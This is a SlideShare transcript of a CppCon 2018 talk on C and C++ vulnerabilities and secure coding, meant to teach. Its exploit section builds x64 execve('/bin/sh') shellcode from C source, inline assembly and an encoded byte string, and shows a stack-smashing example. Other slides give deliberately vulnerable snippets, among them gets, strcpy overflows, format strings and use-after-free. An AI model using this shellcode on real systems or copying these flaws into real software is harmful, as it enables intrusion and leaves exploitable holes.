SlideShare a Scribd company logo

Software Vulnerabilities in C and C++ (CppCon 2018)

Patricia Aas
Patricia Aas

What does a vulnerability using signed integer overflow look like? Or a stack buffer overflow? How does code like this look and how can we change the way we program to reduce our risk? The first half of this talk will show examples of many different vulnerabilities and describe how these are combined to make the first steps of an exploit. Then we will discuss what kind of programming practices we can employ to reduce the chances of these kinds of bugs creeping into our code.

Software
1 of 114
Download to read offline
@pati_gallardo T S
Software Vulnerabilities in C and C++ @pati_gallardo Patricia Aas CppCon 2018 T S
Patricia Aas - Consultant T S C++ Programmer, Application Security Currently : T S Previously : Vivaldi, Cisco Systems, Knowit, Opera Software Master in Computer Science - main language Java Pronouns: she/her
Undefined Behavior What specs exist? Compiler Optimizations Exploit Development 101 Exploitability Take your vitamins The Eight I'd Really Rather You Didn'ts @pati_gallardo
Undefined Behaviour @pati_gallardo
undefined behavior “Examples of undefined behavior are memory accesses outside of array bounds, signed integer overflow, null pointer dereference, modification of the same scalar more than once in an expression without sequence points, access to an object through a pointer of a different type, etc. Compilers are not required to diagnose undefined behavior (although many simple situations are diagnosed), and the compiled program is not required to do anything meaningful.” http://en.cppreference.com/w/cpp/language/ub @pati_gallardo 6
- Don’t reason about undefined behaviour - Assume that it crashes or is never executed - Changing compiler, compiler version or optimization level can break your application Undefined Behaviour
Infinite Loop int main(void) { complex<int> delta; complex<int> mc[4] = {0}; for(int di = 0; di < 4; di++, delta = mc[di]) cout << di << endl; } (Thanks to @shafikyaghmour) https://stackoverflow.com/questions/32506643/c-compilation-bug Undefined Behavior: Access out of bounds @pati_gallardo 8
Infinite Loop Want to give it a try? Compiler Explorer https://godbolt.org/g/TDjM8h Wandbox https://wandbox.org/permlink/aAFP2bMjA3um3L4K Github https://github.com/patricia-gallardo/insecure-coding-examples/ blob/master/vulnerable/infinite_loop.cpp @pati_gallardo (Thanks to @shafikyaghmour) https://stackoverflow.com/questions/32506643/c-compilation-bug9
Undefined Behavior What specs exist? Compiler Optimizations Exploit Development 101 Exploitability Take your vitamins The Eight I'd Really Rather You Didn'ts @pati_gallardo
What specs exist? @pati_gallardo
CG: C++ Core Guidelines (328 pages!) @pati_gallardo
SEI: CERT C++ Coding Standard (435 pages!) @pati_gallardo
CWE : Common Weakness Enumeration (1572 pages!) @pati_gallardo
Undefined Behavior What specs exist? Compiler Optimizations Exploit Development 101 Exploitability Take your vitamins The Eight I'd Really Rather You Didn'ts @pati_gallardo
Compiler Optimization @pati_gallardo
@pati_gallardo The Case Of The Disappearing Memset @pati_gallardo
CWE-14: Compiler Removal of Code to Clear Buffers void GetData(char *MFAddr) { char pwd[64]; if (GetPasswordFromUser(pwd, sizeof(pwd))) { if (ConnectToMainframe(MFAddr, pwd)) { // Interaction with mainframe } } memset(pwd, 0, sizeof(pwd)); // <- Removed by the optimizer } SEI: MSC06-C. Beware of compiler optimizations SEI: MEM03-C. Clear sensitive information stored in reusable resources @pati_gallardo 18
Want to give it a try? https://godbolt.org/g/FpEsht SEI: MSC06-C. Beware of compiler optimizations SEI: MEM03-C. Clear sensitive information stored in reusable resources @pati_gallardo 19 CWE-14: Compiler Removal of Code to Clear Buffers
Memset_s : Zeroing Memory // Compliant Solution (C11) memset_s(pwd, 0, sizeof(pwd)); // Windows Solution SecureZeroMemory(pwd, sizeof(pwd)); SEI: MSC06-C. Beware of compiler optimizations SEI: MEM03-C. Clear sensitive information stored in reusable resources @pati_gallardo 20
Undefined Behavior What specs exist? Compiler Optimizations Exploit Development 101 Exploitability Take your vitamins The Eight I'd Really Rather You Didn'ts @pati_gallardo
Exploit Development 101 @pati_gallardo
Smashing The Stack For Fun And Profit Aleph One, Phrack Magazine issue 49 @pati_gallardo 23
Stack Overflow Code: github.com/patricia-gallardo/insecure-coding-examples/ (directory: smashing) Thanks to #security on #include Discord, especially Vesim and hthh @pati_gallardo 24
Peptalk @pati_gallardo 25
$
Write C code for shellcode Compile it Put bytes in a char buffer Put jmp addr on ret addr @pati_gallardo 27 Write inline assembly, eliminating zero bytes
Shellcode - code that gives you shell int execve( const char *filename, char *const argv[], char *const envp[]); @pati_gallardo Target Process Vulnerable Program Target Process /bin/sh Shellcode 28
Shellcode - code that gives you shell int execve( const char *filename, char *const argv[], char *const envp[]); %rax : syscall number : 59 (x64) %rdi : const char *filename %rsi : const char *const argv[] %rdx : const char *const envp[] @pati_gallardo 29
C code for our shellcode #include <unistd.h> int main(void) { char *name[2]; name[0] = "/bin/sh"; name[1] = NULL; execve(name[0], name, NULL); } @pati_gallardo 30
Write C code for shellcode Compile it Put bytes in a char buffer Put jmp addr on ret addr @pati_gallardo Write inline assembly, eliminating zero bytes 31
int main(void) { __asm__( "jmp push_stringnt" "pop_string: pop %rdint" … "push_string: call pop_stringnt" ".string "/bin/sh"nt" ); } @pati_gallardo 32
Shellcode - code that gives you shell int execve( const char *filename, char *const argv[], char *const envp[]); %rax : syscall number : 59 (x64) %rdi : const char *filename %rsi : const char *const argv[] %rdx : const char *const envp[] @pati_gallardo 33
1. int main(void) { 2. __asm__( 3. "jmp push_stringnt" 4. "pop_string: pop %rdint" 5. "xor %rdx, %rdxnt" 6. "xor %rax, %raxnt" 7. "mov %rsp, %rsint" 8. "mov %rdx, 8(%rsp)nt" 9. "mov %rdi, (%rsp)nt" 10. "mov $0x3b, %alnt" 11. "syscallnt" 12. "push_string: call pop_stringnt" 13. ".string "/bin/sh"nt" 14. ); 15. } @pati_gallardo int execve( const char *filename, char *const argv[], char *const envp[]); %rax : syscall 59 %rdi : filename %rsi : argv[] %rdx : envp[] 34
C code for our shellcode #include <unistd.h> int main(void) { char *name[2]; name[0] = "/bin/sh"; name[1] = NULL; execve(name[0], name, NULL); } @pati_gallardo 35
1. int main(void) { 2. __asm__( 3. "jmp push_stringnt" 4. "pop_string: pop %rdint" 5. "xor %rdx, %rdxnt" 6. "xor %rax, %raxnt" 7. "mov %rsp, %rsint" 8. "mov %rdx, 8(%rsp)nt" 9. "mov %rdi, (%rsp)nt" 10. "mov $0x3b, %alnt" 11. "syscallnt" 12. "push_string: call pop_stringnt" 13. ".string "/bin/sh"nt" 14. ); 15. } @pati_gallardo int execve( const char *filename, char *const argv[], char *const envp[]); %rax : syscall 59 %rdi : filename %rsi : argv[] %rdx : envp[] 36
argv[0] (%rsp) /bin/sh argv[1] 8(%rsp) NULL %rax : syscall number (59 x64) %rdi : const char *filename %rsi : const char *const argv[] %rdx : const char *const envp[] %rdi /bin/sh %rdx 0 (NULL) %rax $0x3b (59, execve syscall #) %rsi %rsp Stack Registers 37
1. int main(void) { 2. __asm__( 3. "jmp push_stringnt" 4. "pop_string: pop %rdint" 5. "xor %rdx, %rdxnt" 6. "xor %rax, %raxnt" 7. "mov %rsp, %rsint" 8. "mov %rdx, 8(%rsp)nt" 9. "mov %rdi, (%rsp)nt" 10. "mov $0x3b, %alnt" 11. "syscallnt" 12. "push_string: call pop_stringnt" 13. ".string "/bin/sh"nt" 14. ); 15. } @pati_gallardo int execve( const char *filename, char *const argv[], char *const envp[]); %rax : syscall 59 %rdi : filename %rsi : argv[] %rdx : envp[] 38
Shellcode - code that gives you shell int execve( const char *filename, char *const argv[], char *const envp[]); @pati_gallardo Target Process Vulnerable Program Target Process /bin/sh Shellcode 39
$
Write C code for shellcode Compile it Put bytes in a char buffer Put jmp addr on ret addr @pati_gallardo Write inline assembly, eliminating zero bytes 41
$ objdump -d shellcodeasm | grep main -C 20
1. int main(void) { 2. __asm__( 3. "jmp push_stringnt" 4. "pop_string: pop %rdint" 5. "xor %rdx, %rdxnt" 6. "xor %rax, %raxnt" 7. "mov %rsp, %rsint" 8. "mov %rdx, 8(%rsp)nt" 9. "mov %rdi, (%rsp)nt" 10. "mov $0x3b, %alnt" 11. "syscallnt" 12. "push_string: call pop_stringnt" 13. ".string "/bin/sh"nt" 14. ); 15. } @pati_gallardo int execve( const char *filename, char *const argv[], char *const envp[]); %rax : syscall 59 %rdi : filename %rsi : argv[] %rdx : envp[] 43
char shellcode[] = "xebx17" // jmp push_string "x5f" // pop_string: pop %rdi "x48x31xd2" // xor %rdx, %rdx "x48x31xc0" // xor %rax, %rax "x48x89xe6" // mov %rsp, %rsi "x48x89x54x24x08" // mov %rdx, 8(%rsp) "x48x89x3cx24" // mov %rdi,(%rsp) "xb0x3b" // mov $0x3b,%al "x0fx05" // syscall "xe8xe4xffxffxff" // callq pop_string "/bin/sh"; @pati_gallardo 44
Write C code for shellcode Compile it Put bytes in a char buffer Put jmp addr on ret addr @pati_gallardo Write inline assembly, eliminating zero bytes 45
int main(void) { intptr_t *ret; ret = (intptr_t *) &ret + 2; (*ret) = (intptr_t) shellcode; } The Exploit: How to run your shell code @pati_gallardo 46
Wat? What Happened to our Stack Overflow? @pati_gallardo 47
Write direction vs Stack growing direction 100 Return address 99 <something> 98 char array item 3 97 char array item 2 96 char array item 1 95 char array item 0 Stack grows toward lower addresses Writes go toward higher addresses ptr++ 48
Write direction vs Stack growing direction 100 char[5]: “ret” address 95 99 char[4]: “ret” address 95 98 char[3]: Shellcode 97 char[2]: Shellcode 96 char[1]: No-op 95 char[0]: No-op Stack grows toward lower addresses Writes go toward higher addresses ptr++ 49
Write direction vs Stack growing direction 100 char[5]: “ret” address 95 99 char[4]: “ret” address 95 98 char[3]: Shellcode 97 char[2]: Shellcode 96 char[1]: No-op 95 char[0]: No-op Stack grows toward lower addresses Instruction addresses also go toward higher addresses 50
Undefined Behavior What specs exist? Compiler Optimizations Exploit Development 101 Exploitability Take your vitamins The Eight I'd Really Rather You Didn'ts @pati_gallardo
Exploitability @pati_gallardo
1. Unsigned Integer Wraparound 2. Signed Integer Overflow 3. Numeric Truncation 4. Stack Buffer Overflow 5. Heap Buffer Overflow 6. Buffer Underflow 7. Use After Free 8. Double Free 9. Incorrect Type Conversion 10. Uncontrolled Format String @pati_gallardo
Code is on GitHub: https://github.com/patricia-gallardo/insecure-coding-examples @pati_gallardo 54
1) Unsigned Integer Wraparound 2) Signed Integer Overflow 3) Numeric Truncation Error @pati_gallardo 55
1) CWE-190: Unsigned Integer Wraparound int main(void) { unsigned int first_len = UINT_MAX; unsigned int second_len = 256; unsigned int buf_len = 256; char first[first_len], second[second_len], buf[buf_len]; if((first_len + second_len) <= 256) { // <- sum == 255 memcpy(buf, first, first_len); memcpy(buf + first_len, second, second_len); } } SEI-INT30-C. Ensure that unsigned integer operations do not wrap @pati_gallardo 56
2) CWE-190: Signed Integer Overflow int main(void) { int first_len = INT_MAX; int second_len = 256; int buf_len = 256; char first[first_len], second[second_len], buf[buf_len]; if((first_len + second_len) <= 256) { // <- UB (negative) memcpy(buf, first, first_len); memcpy(buf + first_len, second, second_len); } } SEI-INT32-C. Ensure that operations on signed integers do not result in @pati_gallardo 57
3) CWE-197: Numeric Truncation Error int main(void) { unsigned int first_len = UINT_MAX - 256; unsigned int second_len = 256; unsigned int buf_len = 256; char first[first_len], second[second_len], buf[buf_len]; int new_len = (first_len+second_len); // IDB (negative) if(new_len <= 256) { memcpy(buf, first, first_len); memcpy(buf + first_len, second, second_len); } } SEI-INT31-C. Ensure that integer conversions do not result in lost or misinterpreted data @pati_gallardo 58
4) Stack-based Buffer Overflow 5) Heap-based Buffer Overflow 6) Buffer Underwrite/Underflow @pati_gallardo 59
4) CWE-121: Stack-based Buffer Overflow int main(void) { char buffer[10]; // CWE-242: Inherently Dangerous Function gets(buffer); // <- Write outside } SEI-STR31-C. Guarantee that storage for str. has sufficient space for character data and the null terminator @pati_gallardo 60
5) CWE-122: Heap-based Buffer Overflow int main(int argc, char * argv[]) { char* buf = (char*)malloc(sizeof(char)*10); strcpy(buf, argv[1]); // <- Write outside free(buf); } SEI-ARR38-C. Guarantee that library functions do not form invalid pointers @pati_gallardo 61
6) CWE-124: Buffer Underwrite / Underflow int main(void) { char src[12]; strcpy(src, "Hello World"); size_t length = strlen(src); int index = (length -1); while (src[index] != ':') { src[index] = '0'; index--; } } SEI-ARR30-C. Do not form or use out-of-bounds pointers or array subscripts @pati_gallardo 62
7) Use After Free 8) Double Free @pati_gallardo 63
7) CWE-416: Use After Free int main(void) { char* buffer = (char*)malloc (256); bool error = true; if (error) free(buffer); // [...] printf("%lun", strlen(buffer)); //Use after free } SEI-MEM30-C. Do not access freed memory @pati_gallardo 64
8) CWE-415: Double Free int main(void) { char* buffer = (char*)malloc (256); bool error = true; if (error) free(buffer); // [...] free(buffer); // second free } SEI-MEM51-CPP. Properly deallocate dynamically allocated resources @pati_gallardo 65
9) Incorrect Type Conversion/Cast 10) Use of External Format String @pati_gallardo 66
9) CWE-704: Incorrect Type Conversion/Cast struct A {}; struct B {}; int main(void) { struct A * a = (struct A *) malloc (sizeof (struct A)); struct B * b = (struct B *) a; // cast to unrelated type } SEI-EXP05-CPP. Do not use C-style casts @pati_gallardo 67
10) CWE-134: Use of External Format String int main(int argc, char * argv[]) { char * format = argv[1]; char * str = argv[2]; printf(format, str); } $ ./format_string "%s %d" "Hello World" Hello World 1745066888 SEI-FIO47-C. Use valid format strings @pati_gallardo 68
Undefined Behavior What specs exist? Compiler Optimizations Exploit Development 101 Exploitability Take your vitamins The Eight I'd Really Rather You Didn'ts @pati_gallardo
Use Your Tools @pati_gallardo @pati_gallardo
Classes of Tools - Several compilers - Warnings / Errors - Instrumentation - Static Analysis - Automated Tests - Fuzzing - Continuous Integration - Libraries @pati_gallardo 71
Undefined Behavior What specs exist? Compiler Optimizations Exploit Development 101 Exploitability Take your vitamins The Eight I'd Really Rather You Didn'ts @pati_gallardo
The Eight I'd Really Rather You Didn'ts* *The Eight Condiments (Pastafarianism) @pati_gallardo 73
Caution: Don’t take me too seriously. But seriously, think about it! *wink* @pati_gallardo 74
The Eight I'd Really Rather You Didn'ts 1. Use C 2. Allocate with new 3. Do math a lot 4. Trust your external input 5. Use pointers a lot 6. Write “clever” code 7. Use shared_ptr a lot 8. Share state a lot @pati_gallardo 75
1. I'd Really Rather You Didn't: Use CCG : CPL.1: Prefer C++ to C @pati_gallardo 76
CG : R: Resource management CG : R.11: Avoid calling new and delete explicitly 2. I'd Really Rather You Didn't: Allocate With New @pati_gallardo 77
3. I'd Really Rather You Didn't: Do Math A Lot @pati_gallardo 78
@pati_gallardo 4. I'd Really Rather You Didn't: Trust Your External Input79
5. I'd Really Rather You Didn't: Use Pointers a Lot @pati_gallardo 80
6. I'd Really Rather You Didn't: Write “clever” code @pati_gallardo 81
7. I'd Really Rather You Didn't: Use shared_ptr a Lot @pati_gallardo 82
8. I'd Really Rather You Didn't: Share State a Lot @pati_gallardo 83
T S P f . Patricia Aas, T S @pati_gallardo
@pati_gallardo T S
Expanding on Some of the points
The Eight I'd Really Rather You Didn'ts 1. Use C 2. Allocate with new 3. Do math a lot 4. Trust your external input 5. Use pointers a lot 6. Write “clever” code 7. Use shared_ptr a lot 8. Share state a lot @pati_gallardo 87
1. I'd Really Rather You Didn't: Use CCG : CPL.1: Prefer C++ to C @pati_gallardo 88
Std::string - Concatenate Strings int main() { std::string first = "Hello "; std::string second = "World"; std::string buffer = first + second; std::cout << buffer << "n"; } @pati_gallardo 89
Std::cout/cin : Using the Command Line int main(int argc, char * argv[]) { std::string second; std::cin >> second; std::string first = argv[1]; std::string buffer = first + second; std::cout << buffer << "n"; } $ ./command_line "Hello " World Hello World @pati_gallardo 90
Algorithms : Strip after Colon int main() { string str = "Hello:World"; auto colon = [](int ch) { return ch == ':'; }; auto first = find_if(rbegin(str), rend(str), colon); str.erase(first.base(), end(str)); } @pati_gallardo 91
C++ Casts : Safe Downcasting class Spiderman {}; class Ironman {}; int main() { Spiderman * peter = new Spiderman; Ironman * tony = static_cast<Ironman*>(peter); } inheritance.cpp:6:20: error: static_cast from 'Spiderman *' to 'Ironman *', which are not related by inheritance, is not allowed Ironman * tony = static_cast<Ironman*>(peter); ^~~~~~~~~~~~~~~~~~~~~~~~~~~~ 1 error generated. @pati_gallardo 92
CG : R: Resource management CG : R.11: Avoid calling new and delete explicitly 2. I'd Really Rather You Didn't: Allocate With New93 @pati_gallardo
Allocating on the Stack #include "Hero.h" int main() { Hero h; } @pati_gallardo @pati_gallardo
Where is it? Stack Hero stackHero; Heap unique_ptr<Hero> heapHero = make_unique<Hero>(); Hero * heapHero = new Hero(); @pati_gallardo @pati_gallardo
Loving the Stack #include <iostream> #include <string> using namespace std; int main() { { string s("Hello World!"); cout << s; } // <- GC happens here! } @pati_gallardo @pati_gallardo
Using the Stack To Manage Resource Lifetimes Destroyed when exiting scope Deterministic Garbage Collection @pati_gallardo
Hold a Value on the Stack that Controls The Lifetime of Your Heap Allocated Object using namespace std; { unique_ptr<Hero> myHero = make_unique<Hero>(); shared_ptr<Hero> ourHero = make_shared<Hero>(); } Smart Pointers @pati_gallardo
3. I'd Really Rather You Didn't: Do Math A Lot @pati_gallardo 99
Primitive types have no semantics, only limits Reduce the value space Keep it within defined behavior Enum class, string literals, user defined literals, size_t @pati_gallardo100
Enum Class enum class Direction : char { NORTH = 'N', EAST = 'E', WEST = 'W', SOUTH = 'S' }; std::ostream& operator << (std::ostream& os, const Direction& obj) { os << static_cast<std::underlying_type<Direction>::type>(obj); return os; } int main() { std::cout << "t" << Direction::NORTH << "n" << "t" << Direction::EAST << "n" << "t" << Direction::WEST << "n" << "t" << Direction::SOUTH << "n"; } @pati_gallardo 101
String Literals using namespace std::literals::string_literals; int main() { auto heroes = {"Spiderman"s, "Ironman"s, "Wonder Woman"s}; for(auto const & hero : heroes) { std::cout << "t" << hero << "n"; } } @pati_gallardo 102
1) User Defined Literals int main() { auto h = 24_hours; auto d = 7_days; auto err = h + d; } user_defined_literals.cpp:25:21: error: invalid operands to binary expression ('Hours' and 'Days') auto err = hours + days; ~~~~~ ^ ~~~~ 1 error generated. @pati_gallardo 103
2) User Defined Literals struct Hours { explicit Hours(unsigned long long n) : num(n) {} unsigned long long num = 0; }; struct Days { explicit Days(unsigned long long n) : num(n) {} unsigned long long num = 0; }; @pati_gallardo 104
3) User Defined Literals Hours operator "" _hours(unsigned long long num) { return Hours(num); } Days operator "" _days(unsigned long long num) { return Days(num); } @pati_gallardo 105
Use Size_t for Sizes - Unsigned integer type - Result of the sizeof operator - Use for object sizes - Use for array indexing and loop counting @pati_gallardo 106
@pati_gallardo 4. I'd Really Rather You Didn't: Trust Your External Input107
Taint - Is the source of this value in your code? - Command line args, size fields in headers, exported functions, APIs @pati_gallardo 108
So… what should I remember from this presentation? @pati_gallardo 109
Well, I'd Really Rather You Didn't: Use C @pati_gallardo 110
Learn some Modern C++ Instead! @pati_gallardo 111
Bjarne Stroustrup “C makes it easy to shoot yourself in the foot; C++ makes it harder, but when you do it blows your whole leg off.” @pati_gallardo 112
Bjarne Stroustrup “Within C++, there is a much smaller and cleaner language struggling to get out.” @pati_gallardo 113
@pati_gallardo T S

Recommended

Classic Vulnerabilities (MUCplusplus2022).pdf
Classic Vulnerabilities (MUCplusplus2022).pdfClassic Vulnerabilities (MUCplusplus2022).pdf
Classic Vulnerabilities (MUCplusplus2022).pdf
Patricia Aas
 
R Programming: Learn To Manipulate Strings In R
R Programming: Learn To Manipulate Strings In RR Programming: Learn To Manipulate Strings In R
R Programming: Learn To Manipulate Strings In R
Rsquared Academy
 
Socat
SocatSocat
Socat
Nitin Kumar Yadav
 
Inline function(oops)
Inline function(oops)Inline function(oops)
Inline function(oops)Jay Patel
 
Data Structures Practical File
Data Structures Practical File Data Structures Practical File
Data Structures Practical File
Harjinder Singh
 
Data Structure using C
Data Structure using CData Structure using C
Data Structure using C
Bilal Mirza
 
design and analysis of algorithm Lab files
design and analysis of algorithm Lab filesdesign and analysis of algorithm Lab files
design and analysis of algorithm Lab files
Nitesh Dubey
 
C++ file
C++ fileC++ file
C++ fileMukund Trivedi
 

Recommended

Classic Vulnerabilities (MUCplusplus2022).pdf
Classic Vulnerabilities (MUCplusplus2022).pdfClassic Vulnerabilities (MUCplusplus2022).pdf
Classic Vulnerabilities (MUCplusplus2022).pdf
Patricia Aas
 
R Programming: Learn To Manipulate Strings In R
R Programming: Learn To Manipulate Strings In RR Programming: Learn To Manipulate Strings In R
R Programming: Learn To Manipulate Strings In R
Rsquared Academy
 
Socat
SocatSocat
Socat
Nitin Kumar Yadav
 
Inline function(oops)
Inline function(oops)Inline function(oops)
Inline function(oops)Jay Patel
 
Data Structures Practical File
Data Structures Practical File Data Structures Practical File
Data Structures Practical File
Harjinder Singh
 
Data Structure using C
Data Structure using CData Structure using C
Data Structure using C
Bilal Mirza
 
design and analysis of algorithm Lab files
design and analysis of algorithm Lab filesdesign and analysis of algorithm Lab files
design and analysis of algorithm Lab files
Nitesh Dubey
 
C++ file
C++ fileC++ file
C++ fileMukund Trivedi
 
Constructors and Destructors
Constructors and DestructorsConstructors and Destructors
Constructors and Destructors
Dr Sukhpal Singh Gill
 
Oops practical file
Oops practical fileOops practical file
Oops practical fileAnkit Dixit
 
String and string manipulation x
String and string manipulation xString and string manipulation x
String and string manipulation xShahjahan Samoon
 
Inline function
Inline functionInline function
Inline functionTech_MX
 
c++ project on restaurant billing
c++ project on restaurant billing c++ project on restaurant billing
c++ project on restaurant billing
Swakriti Rathore
 
Why functional programming and category theory strongly matters
Why functional programming and category theory strongly mattersWhy functional programming and category theory strongly matters
Why functional programming and category theory strongly matters
Piotr Paradziński
 
Let us C (by yashvant Kanetkar) chapter 3 Solution
Let us C (by yashvant Kanetkar) chapter 3 SolutionLet us C (by yashvant Kanetkar) chapter 3 Solution
Let us C (by yashvant Kanetkar) chapter 3 Solution
Hazrat Bilal
 
LET US C (5th EDITION) CHAPTER 2 ANSWERS
LET US C (5th EDITION) CHAPTER 2 ANSWERSLET US C (5th EDITION) CHAPTER 2 ANSWERS
LET US C (5th EDITION) CHAPTER 2 ANSWERS
KavyaSharma65
 
Deep C
Deep CDeep C
Deep C
Olve Maudal
 
Let us c chapter 4 solution
Let us c chapter 4 solutionLet us c chapter 4 solution
Let us c chapter 4 solution
rohit kumar
 
Chapter 5 Balagurusamy Programming ANSI in c
Chapter 5 Balagurusamy Programming ANSI in cChapter 5 Balagurusamy Programming ANSI in c
Chapter 5 Balagurusamy Programming ANSI in c
BUBT
 
List in Python
List in PythonList in Python
List in Python
Siddique Ibrahim
 
PythonOOP
PythonOOPPythonOOP
PythonOOP
Veera Pendyala
 
File handling in C
File handling in CFile handling in C
File handling in C
Kamal Acharya
 
Let us c(by Yashwant Kanetkar) 5th edition solution chapter 1
Let us c(by Yashwant Kanetkar) 5th edition solution chapter 1Let us c(by Yashwant Kanetkar) 5th edition solution chapter 1
Let us c(by Yashwant Kanetkar) 5th edition solution chapter 1
rohit kumar
 
Hotel Management Presentation by Aryan Singh Dhiman
Hotel Management Presentation by Aryan Singh DhimanHotel Management Presentation by Aryan Singh Dhiman
Hotel Management Presentation by Aryan Singh Dhiman
AryanSinghDhiman
 
Data Type Conversion in C++
Data Type Conversion in C++Data Type Conversion in C++
Data Type Conversion in C++Danial Mirza
 
Insecure coding in C (and C++)
Insecure coding in C (and C++)Insecure coding in C (and C++)
Insecure coding in C (and C++)
Olve Maudal
 
Files in c++
Files in c++Files in c++
Files in c++
Selvin Josy Bai Somu
 
Structure in C
Structure in CStructure in C
Structure in C
Kamal Acharya
 
printf("%s from %c to Z, in %d minutes!\n", "printf", 'A', 45);
printf("%s from %c to Z, in %d minutes!\n", "printf", 'A', 45);printf("%s from %c to Z, in %d minutes!\n", "printf", 'A', 45);
printf("%s from %c to Z, in %d minutes!\n", "printf", 'A', 45);
Joel Porquet
 
Secure Programming Practices in C++ (NDC Oslo 2018)
Secure Programming Practices in C++ (NDC Oslo 2018)Secure Programming Practices in C++ (NDC Oslo 2018)
Secure Programming Practices in C++ (NDC Oslo 2018)
Patricia Aas
 

More Related Content

What's hot

Constructors and Destructors
Constructors and DestructorsConstructors and Destructors
Constructors and Destructors
Dr Sukhpal Singh Gill
 
Oops practical file
Oops practical fileOops practical file
Oops practical fileAnkit Dixit
 
String and string manipulation x
String and string manipulation xString and string manipulation x
String and string manipulation xShahjahan Samoon
 
Inline function
Inline functionInline function
Inline functionTech_MX
 
c++ project on restaurant billing
c++ project on restaurant billing c++ project on restaurant billing
c++ project on restaurant billing
Swakriti Rathore
 
Why functional programming and category theory strongly matters
Why functional programming and category theory strongly mattersWhy functional programming and category theory strongly matters
Why functional programming and category theory strongly matters
Piotr Paradziński
 
Let us C (by yashvant Kanetkar) chapter 3 Solution
Let us C (by yashvant Kanetkar) chapter 3 SolutionLet us C (by yashvant Kanetkar) chapter 3 Solution
Let us C (by yashvant Kanetkar) chapter 3 Solution
Hazrat Bilal
 
LET US C (5th EDITION) CHAPTER 2 ANSWERS
LET US C (5th EDITION) CHAPTER 2 ANSWERSLET US C (5th EDITION) CHAPTER 2 ANSWERS
LET US C (5th EDITION) CHAPTER 2 ANSWERS
KavyaSharma65
 
Deep C
Deep CDeep C
Deep C
Olve Maudal
 
Let us c chapter 4 solution
Let us c chapter 4 solutionLet us c chapter 4 solution
Let us c chapter 4 solution
rohit kumar
 
Chapter 5 Balagurusamy Programming ANSI in c
Chapter 5 Balagurusamy Programming ANSI in cChapter 5 Balagurusamy Programming ANSI in c
Chapter 5 Balagurusamy Programming ANSI in c
BUBT
 
List in Python
List in PythonList in Python
List in Python
Siddique Ibrahim
 
PythonOOP
PythonOOPPythonOOP
PythonOOP
Veera Pendyala
 
File handling in C
File handling in CFile handling in C
File handling in C
Kamal Acharya
 
Let us c(by Yashwant Kanetkar) 5th edition solution chapter 1
Let us c(by Yashwant Kanetkar) 5th edition solution chapter 1Let us c(by Yashwant Kanetkar) 5th edition solution chapter 1
Let us c(by Yashwant Kanetkar) 5th edition solution chapter 1
rohit kumar
 
Hotel Management Presentation by Aryan Singh Dhiman
Hotel Management Presentation by Aryan Singh DhimanHotel Management Presentation by Aryan Singh Dhiman
Hotel Management Presentation by Aryan Singh Dhiman
AryanSinghDhiman
 
Data Type Conversion in C++
Data Type Conversion in C++Data Type Conversion in C++
Data Type Conversion in C++Danial Mirza
 
Insecure coding in C (and C++)
Insecure coding in C (and C++)Insecure coding in C (and C++)
Insecure coding in C (and C++)
Olve Maudal
 
Files in c++
Files in c++Files in c++
Files in c++
Selvin Josy Bai Somu
 
Structure in C
Structure in CStructure in C
Structure in C
Kamal Acharya
 

What's hot (20)

Constructors and Destructors
Constructors and DestructorsConstructors and Destructors
Constructors and Destructors
 
Oops practical file
Oops practical fileOops practical file
Oops practical file
 
String and string manipulation x
String and string manipulation xString and string manipulation x
String and string manipulation x
 
Inline function
Inline functionInline function
Inline function
 
c++ project on restaurant billing
c++ project on restaurant billing c++ project on restaurant billing
c++ project on restaurant billing
 
Why functional programming and category theory strongly matters
Why functional programming and category theory strongly mattersWhy functional programming and category theory strongly matters
Why functional programming and category theory strongly matters
 
Let us C (by yashvant Kanetkar) chapter 3 Solution
Let us C (by yashvant Kanetkar) chapter 3 SolutionLet us C (by yashvant Kanetkar) chapter 3 Solution
Let us C (by yashvant Kanetkar) chapter 3 Solution
 
LET US C (5th EDITION) CHAPTER 2 ANSWERS
LET US C (5th EDITION) CHAPTER 2 ANSWERSLET US C (5th EDITION) CHAPTER 2 ANSWERS
LET US C (5th EDITION) CHAPTER 2 ANSWERS
 
Deep C
Deep CDeep C
Deep C
 
Let us c chapter 4 solution
Let us c chapter 4 solutionLet us c chapter 4 solution
Let us c chapter 4 solution
 
Chapter 5 Balagurusamy Programming ANSI in c
Chapter 5 Balagurusamy Programming ANSI in cChapter 5 Balagurusamy Programming ANSI in c
Chapter 5 Balagurusamy Programming ANSI in c
 
List in Python
List in PythonList in Python
List in Python
 
PythonOOP
PythonOOPPythonOOP
PythonOOP
 
File handling in C
File handling in CFile handling in C
File handling in C
 
Let us c(by Yashwant Kanetkar) 5th edition solution chapter 1
Let us c(by Yashwant Kanetkar) 5th edition solution chapter 1Let us c(by Yashwant Kanetkar) 5th edition solution chapter 1
Let us c(by Yashwant Kanetkar) 5th edition solution chapter 1
 
Hotel Management Presentation by Aryan Singh Dhiman
Hotel Management Presentation by Aryan Singh DhimanHotel Management Presentation by Aryan Singh Dhiman
Hotel Management Presentation by Aryan Singh Dhiman
 
Data Type Conversion in C++
Data Type Conversion in C++Data Type Conversion in C++
Data Type Conversion in C++
 
Insecure coding in C (and C++)
Insecure coding in C (and C++)Insecure coding in C (and C++)
Insecure coding in C (and C++)
 
Files in c++
Files in c++Files in c++
Files in c++
 
Structure in C
Structure in CStructure in C
Structure in C
 

Similar to Software Vulnerabilities in C and C++ (CppCon 2018)

printf("%s from %c to Z, in %d minutes!\n", "printf", 'A', 45);
printf("%s from %c to Z, in %d minutes!\n", "printf", 'A', 45);printf("%s from %c to Z, in %d minutes!\n", "printf", 'A', 45);
printf("%s from %c to Z, in %d minutes!\n", "printf", 'A', 45);
Joel Porquet
 
Secure Programming Practices in C++ (NDC Oslo 2018)
Secure Programming Practices in C++ (NDC Oslo 2018)Secure Programming Practices in C++ (NDC Oslo 2018)
Secure Programming Practices in C++ (NDC Oslo 2018)
Patricia Aas
 
Upping the APT hunting game: learn the best YARA practices from Kaspersky
Upping the APT hunting game: learn the best YARA practices from KasperskyUpping the APT hunting game: learn the best YARA practices from Kaspersky
Upping the APT hunting game: learn the best YARA practices from Kaspersky
Kaspersky
 
Secure Programming Practices in C++ (NDC Security 2018)
Secure Programming Practices in C++ (NDC Security 2018)Secure Programming Practices in C++ (NDC Security 2018)
Secure Programming Practices in C++ (NDC Security 2018)
Patricia Aas
 
C++ The Principles of Most Surprise
C++ The Principles of Most SurpriseC++ The Principles of Most Surprise
C++ The Principles of Most Surprise
Patricia Aas
 
04 - I love my OS, he protects me (sometimes, in specific circumstances)
